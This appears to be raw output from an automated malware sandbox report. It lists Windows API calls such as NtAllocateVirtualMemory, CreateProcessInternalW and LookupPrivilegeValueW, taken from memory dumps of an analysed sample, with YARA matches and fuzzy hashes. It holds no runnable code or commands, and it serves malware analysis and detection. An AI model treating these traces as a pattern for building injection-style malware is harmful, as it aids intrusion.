                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 660a87f5e44aaa8edf3a90c879f3f55b9ad7ed9ff3f6bd72651b2cdfb9945f9f
                                                                                  • Instruction ID: b24aeb6df6e4de8b748bf4e871fdf5564a7c09c9bd2015aab85cddb24fd6d5d8
                                                                                  • Opcode Fuzzy Hash: 660a87f5e44aaa8edf3a90c879f3f55b9ad7ed9ff3f6bd72651b2cdfb9945f9f
                                                                                  • Instruction Fuzzy Hash: 9DF0E7B6200208AFCB04DF88CC81DEB77A9EF8C714F018658BE1D97240DA30E812CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(030E3D52,5E972F59,FFFFFFFF,030E3A11,?,?,030E3D52,?,030E3A11,FFFFFFFF,5E972F59,030E3D52,?,00000000), ref: 030E82B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                  • Instruction ID: 700938a2b5fab331b32e39709181fd3c89864da5fd606d49f003fd3a2cb43356
                                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                  • Instruction Fuzzy Hash: 62F0A4B6200208AFCB14DF89DC80EEB77ADAF8C754F158648BA1D97241DA30E811CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030D2D11,00002000,00003000,00000004), ref: 030E83D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: c4489b1120e8fca708eb0dd69236c3e7962f440d4cfb4d83d9275a85c487bcc0
                                                                                  • Instruction ID: 224b5c22fd0114ede8b7855a42d2fd8c6ba1a084741a231cebfbed13a6657d2a
                                                                                  • Opcode Fuzzy Hash: c4489b1120e8fca708eb0dd69236c3e7962f440d4cfb4d83d9275a85c487bcc0
                                                                                  • Instruction Fuzzy Hash: 03F0FE75204209AFDB14DF99CC80EA777ADAF88650F158648FA5897281C630E811CBE4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030D2D11,00002000,00003000,00000004), ref: 030E83D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                  • Instruction ID: f59e50ef2b6545423a2067dcb50e03318659385e699686bfa007ffbdf3531a81
                                                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                  • Instruction Fuzzy Hash: CAF015B6200208AFCB14DF89CC80EEB77ADAF88650F118548FE0897241C630F810CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtClose.NTDLL(030E3D30,?,?,030E3D30,00000000,FFFFFFFF), ref: 030E8315
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 4c0f54320744814167908c574265a929d74afca5e4580a37a7b8133f0940c156
                                                                                  • Instruction ID: fe5582006fac8cacde0db4c05b88bd2cebbe9644df5022ffd7f2bb21940cb921
                                                                                  • Opcode Fuzzy Hash: 4c0f54320744814167908c574265a929d74afca5e4580a37a7b8133f0940c156
                                                                                  • Instruction Fuzzy Hash: 88E08C7A240204ABD710EBE48C44EE77B68EF88620F098494BA485B242C530E90087D0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtClose.NTDLL(030E3D30,?,?,030E3D30,00000000,FFFFFFFF), ref: 030E8315
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                  • Instruction ID: fcbcee6fa6262ae0dd7f87051c64070ff9a31304e33736b1b752949429e94c94
                                                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                  • Instruction Fuzzy Hash: 9BD012762003146BD710EFD8CC45ED7775CEF44650F154455BA185B241C530F90086E0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e8d3c79cf87e6d83512060a2b06bce6d96510eac870026299fbcd3ac7e5f5c4a
                                                                                  • Instruction ID: 1aa03db438e7e27eef249cdbd1f423d1ba3a28dbd00ec81685adbe89967d3708
                                                                                  • Opcode Fuzzy Hash: e8d3c79cf87e6d83512060a2b06bce6d96510eac870026299fbcd3ac7e5f5c4a
                                                                                  • Instruction Fuzzy Hash: 48900266211041030205A659578450F055697D6391391C075F1005590CD66188616161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 38e0ac2d4b1752d63ea31a4d03ef148330554553eb3fe276e3e963aeb0ebf08a
                                                                                  • Instruction ID: c39c1cb31f355f07ca9412d0ce6e4af0b8c5709852c4b87f6dd220259f851d1d
                                                                                  • Opcode Fuzzy Hash: 38e0ac2d4b1752d63ea31a4d03ef148330554553eb3fe276e3e963aeb0ebf08a
                                                                                  • Instruction Fuzzy Hash: 049002A22020410342057259949461E451A97E1241B91C075E10045D0DC56588917165
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: bf40bd71b540a9bb251f315bec2dfc8d7842d05a0989a73952689856f2655cb4
                                                                                  • Instruction ID: cef566ec27b9d772b3da515b1afdc9e994aebf65a1c362ef7cefc7d6bc2ec47b
                                                                                  • Opcode Fuzzy Hash: bf40bd71b540a9bb251f315bec2dfc8d7842d05a0989a73952689856f2655cb4
                                                                                  • Instruction Fuzzy Hash: 0290027220104502D2006699A48864E051597E1341F91D065A5014595EC6A588917171
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e88f5d9741197e57492e0ec0fd4e6dcf410414d917403064856b1908339328ef
                                                                                  • Instruction ID: 72c17dbfaa2f46db37e7d171eeeafb191a526a998a85e62a9756330e3276d339
                                                                                  • Opcode Fuzzy Hash: e88f5d9741197e57492e0ec0fd4e6dcf410414d917403064856b1908339328ef
                                                                                  • Instruction Fuzzy Hash: EE90026A21304102D2807259A48860E051597D2242FD1D469A0005598CC95588696361
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 098b82ec24498436733197b88bdada77fa91ae3da3b4bfba6a2eb842d22a9bf5
                                                                                  • Instruction ID: 07590cc0e94a1d0a4f79721e4c558e445f8db24315d4608079159f64aa12c58d
                                                                                  • Opcode Fuzzy Hash: 098b82ec24498436733197b88bdada77fa91ae3da3b4bfba6a2eb842d22a9bf5
                                                                                  • Instruction Fuzzy Hash: 8790027231118502D2106259D48470E051597D2241F91C465A0814598D86D588917162
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 903967ae45af1fb49266d96a4100f36446d26bc9be5767ab65f36bf9049641b7
                                                                                  • Instruction ID: 0e34636c5fa671e71cb8ead47c05f8c8537b504e9aab98353906515126e2fcf0
                                                                                  • Opcode Fuzzy Hash: 903967ae45af1fb49266d96a4100f36446d26bc9be5767ab65f36bf9049641b7
                                                                                  • Instruction Fuzzy Hash: 1D90027220508942D24072599484A4E052597D1345F91C065A00546D4D96658D55B6A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9834454a1959a4e08705021963d1b893bb1d58092f629d9f532c67a384a16ff0
                                                                                  • Instruction ID: 80bc58a12c082fd5dace6d8f6712f615c09a92a4536e8ef463a91aa36d6fa9b8
                                                                                  • Opcode Fuzzy Hash: 9834454a1959a4e08705021963d1b893bb1d58092f629d9f532c67a384a16ff0
                                                                                  • Instruction Fuzzy Hash: D090027220104902D2807259948464E051597D2341FD1C069A0015694DCA558A5977E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 944a2bf77f96b87ca7046cfae3a4930dac54ab9900be76dd705822e850098ed2
                                                                                  • Instruction ID: 570c0303382134055f1b2d72ac4459cebd5d517a8a4578259cf7b09173db31ab
                                                                                  • Opcode Fuzzy Hash: 944a2bf77f96b87ca7046cfae3a4930dac54ab9900be76dd705822e850098ed2
                                                                                  • Instruction Fuzzy Hash: 2D90027220104942D20062599484B4E051597E1341F91C06AA0114694D8655C8517561
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 70f36ca74cb3fcac2f92938e5200fc7df24752a8fbc1f9cef2f6ec8589094066
                                                                                  • Instruction ID: ff18014038189699fb3112059c5c3e131dde225e2f94630334277f89ad6448c9
                                                                                  • Opcode Fuzzy Hash: 70f36ca74cb3fcac2f92938e5200fc7df24752a8fbc1f9cef2f6ec8589094066
                                                                                  • Instruction Fuzzy Hash: 949002722010C902D2106259D48474E051597D1341F95C465A4414698D86D588917161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0a7a9696516d9b1ba85a6b9a16636f839bad4c11f6ca47b8575f20bf9d076593
                                                                                  • Instruction ID: 42f6419cd2c2b38466717689436606fb30c1d4f880910b35c79d340d3b01c931
                                                                                  • Opcode Fuzzy Hash: 0a7a9696516d9b1ba85a6b9a16636f839bad4c11f6ca47b8575f20bf9d076593
                                                                                  • Instruction Fuzzy Hash: 7F9002B220104502D2407259948474E051597D1341F91C065A5054594E86998DD576A5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9bc292766c353a851d665d82d7e26759f43307cfa00b24b20ff059d74a2b57d6
                                                                                  • Instruction ID: fec1e12701420057e35c8b03c16a81d91f350ee8c7ae4857c2217e29a2ed4642
                                                                                  • Opcode Fuzzy Hash: 9bc292766c353a851d665d82d7e26759f43307cfa00b24b20ff059d74a2b57d6
                                                                                  • Instruction Fuzzy Hash: F09002A234104542D20062599494B0E0515D7E2341F91C069E1054594D8659CC527166
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4adf08fd259ccbcff0bb5a77ef2135d69dc6ad3f0e5079b72e1cfa8b28e8c2a1
                                                                                  • Instruction ID: 80b6b927fe9edcf815f1ef378afd1d8976d42b8fb4df0aa7b572b7d835568548
                                                                                  • Opcode Fuzzy Hash: 4adf08fd259ccbcff0bb5a77ef2135d69dc6ad3f0e5079b72e1cfa8b28e8c2a1
                                                                                  • Instruction Fuzzy Hash: 3F900262242082525645B259948450F4516A7E12817D1C066A1404990C85669856E661
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 94943cc94d4803fd2eacc69db9854cb8fd08e9271b0504389da130880b9ec345
                                                                                  • Instruction ID: cff25584189d72a8e820c3e4c29274ab4a2d64b9773a4bbb6ed3d3f0fca9f17b
                                                                                  • Opcode Fuzzy Hash: 94943cc94d4803fd2eacc69db9854cb8fd08e9271b0504389da130880b9ec345
                                                                                  • Instruction Fuzzy Hash: 6390027220104513D2116259958470F051997D1281FD1C466A0414598D96968952B161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: fb2cd2e907bad04ea43e1baff30228e5c5d905e430f68ab9b5475510f0956120
                                                                                  • Instruction ID: 89f0e57520acc6eb5f2afdcef4edebe64d0d3d93deca7c3661389ae70dccc606
                                                                                  • Opcode Fuzzy Hash: fb2cd2e907bad04ea43e1baff30228e5c5d905e430f68ab9b5475510f0956120
                                                                                  • Instruction Fuzzy Hash: 3090026221184142D30066699C94B0F051597D1343F91C169A0144594CC95588616561
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 030E6F88
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: a6c48969d60db3ceed74e40211ad581f30d69321df0dca94363978bf35b7afca
                                                                                  • Instruction ID: 6c73b718d0aa2fd0ee2a300f5c88c85d5ed5691021858f04a009130d6da570dc
                                                                                  • Opcode Fuzzy Hash: a6c48969d60db3ceed74e40211ad581f30d69321df0dca94363978bf35b7afca
                                                                                  • Instruction Fuzzy Hash: 143181B5602708AFC715DF68D8A0FABB7F8FB88700F04855DF61A5B241D771A545CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 030E6F88
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: 963afd7b734922ea1f6b313fb063d5fb129ffd9ee3720c61779108ea36705dfa
                                                                                  • Instruction ID: 11850df225ce58da8b32b2b7bc4455dd0c5aafd6811aed2fdef0752b1bcf846a
                                                                                  • Opcode Fuzzy Hash: 963afd7b734922ea1f6b313fb063d5fb129ffd9ee3720c61779108ea36705dfa
                                                                                  • Instruction Fuzzy Hash: 2F31B4B6702308AFC714DF54E8A1FABB7F8EB98310F048069F6195B241D775A455CBE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030D3B93), ref: 030E84FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: .z`
                                                                                  • API String ID: 3298025750-1441809116
                                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                  • Instruction ID: 5ccb2c4aba946b77616cf74f5b6b9f2131e708d918022a190f4389c9e5781437
                                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                  • Instruction Fuzzy Hash: 01E012B6200208ABDB18EF99CC48EA777ACAF88650F018558FA085B241CA30E910CAB0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030D72BA
                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030D72DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID:
                                                                                  • API String ID: 1836367815-0
                                                                                  • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                  • Instruction ID: 721c1afb2e2821ee7352d013376cc4705bd00a9c0ff23f270c84568da8edd0b3
                                                                                  • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                  • Instruction Fuzzy Hash: 0101A235A823287AE720EA948C42FFEB7AC9B80F50F150159FF04BE1C0E694690687F5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 030D9B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                  • Instruction ID: c623c1e78301eb8387fba440cc170ed87d9c5e23fb196e9ad45ea95ae8d14071
                                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                  • Instruction Fuzzy Hash: E10108B9E0120DABDB10EAA4DD41FDEB7B89B44208F0441A5A9089B281F631EA18CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030E8594
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                  • Instruction ID: 549f8fa6a732bda4c0115391e206cad343036ff7cc013835bbc1763ea4b8e4ad
                                                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                  • Instruction Fuzzy Hash: A201AFB2214208AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030E8594
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: 1a3554c41a9f0d6a3275fd6e07cdc687f2237a69a707faacc0d9be122fd7795f
                                                                                  • Instruction ID: 745e00a6bfde2ccb17907fc97e5256104b1bf19a2bb34e611e02f55e97729bdd
                                                                                  • Opcode Fuzzy Hash: 1a3554c41a9f0d6a3275fd6e07cdc687f2237a69a707faacc0d9be122fd7795f
                                                                                  • Instruction Fuzzy Hash: 4101B2B6205108BFCB54DF99DC80EEB77ADAF8C754F158248FA0DA7251C630E851CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,030DCFA2,030DCFA2,?,00000000,?,?), ref: 030E8660
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LookupPrivilegeValue
                                                                                  • String ID:
                                                                                  • API String ID: 3899507212-0
                                                                                  • Opcode ID: 9eed4e7e919a44c000353b36706b80de4e9123cfab0341f443dddb310e560443
                                                                                  • Instruction ID: 1190189ad81b2328a2a1abe57fe473d802151faf74c1e54970cef90bb7d8902a
                                                                                  • Opcode Fuzzy Hash: 9eed4e7e919a44c000353b36706b80de4e9123cfab0341f443dddb310e560443
                                                                                  • Instruction Fuzzy Hash: 4CF090B5201218AFDB14DFA4DC44EEBB79DEF85B20F058199FA4C6B211CA31E804CBB0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030DCCD0,?,?), ref: 030E704C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                                  • Instruction ID: 6fff31011248e293b0d1fc8e59cdb3fe884e02b91f308309f9943441d3ed4d5c
                                                                                  • Opcode Fuzzy Hash: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                                  • Instruction Fuzzy Hash: DDE06D373923043AE230A5999C02FE7B39CDB81B21F540066FA0DEB2C0D595F80142A5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,030DCFA2,030DCFA2,?,00000000,?,?), ref: 030E8660
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LookupPrivilegeValue
                                                                                  • String ID:
                                                                                  • API String ID: 3899507212-0
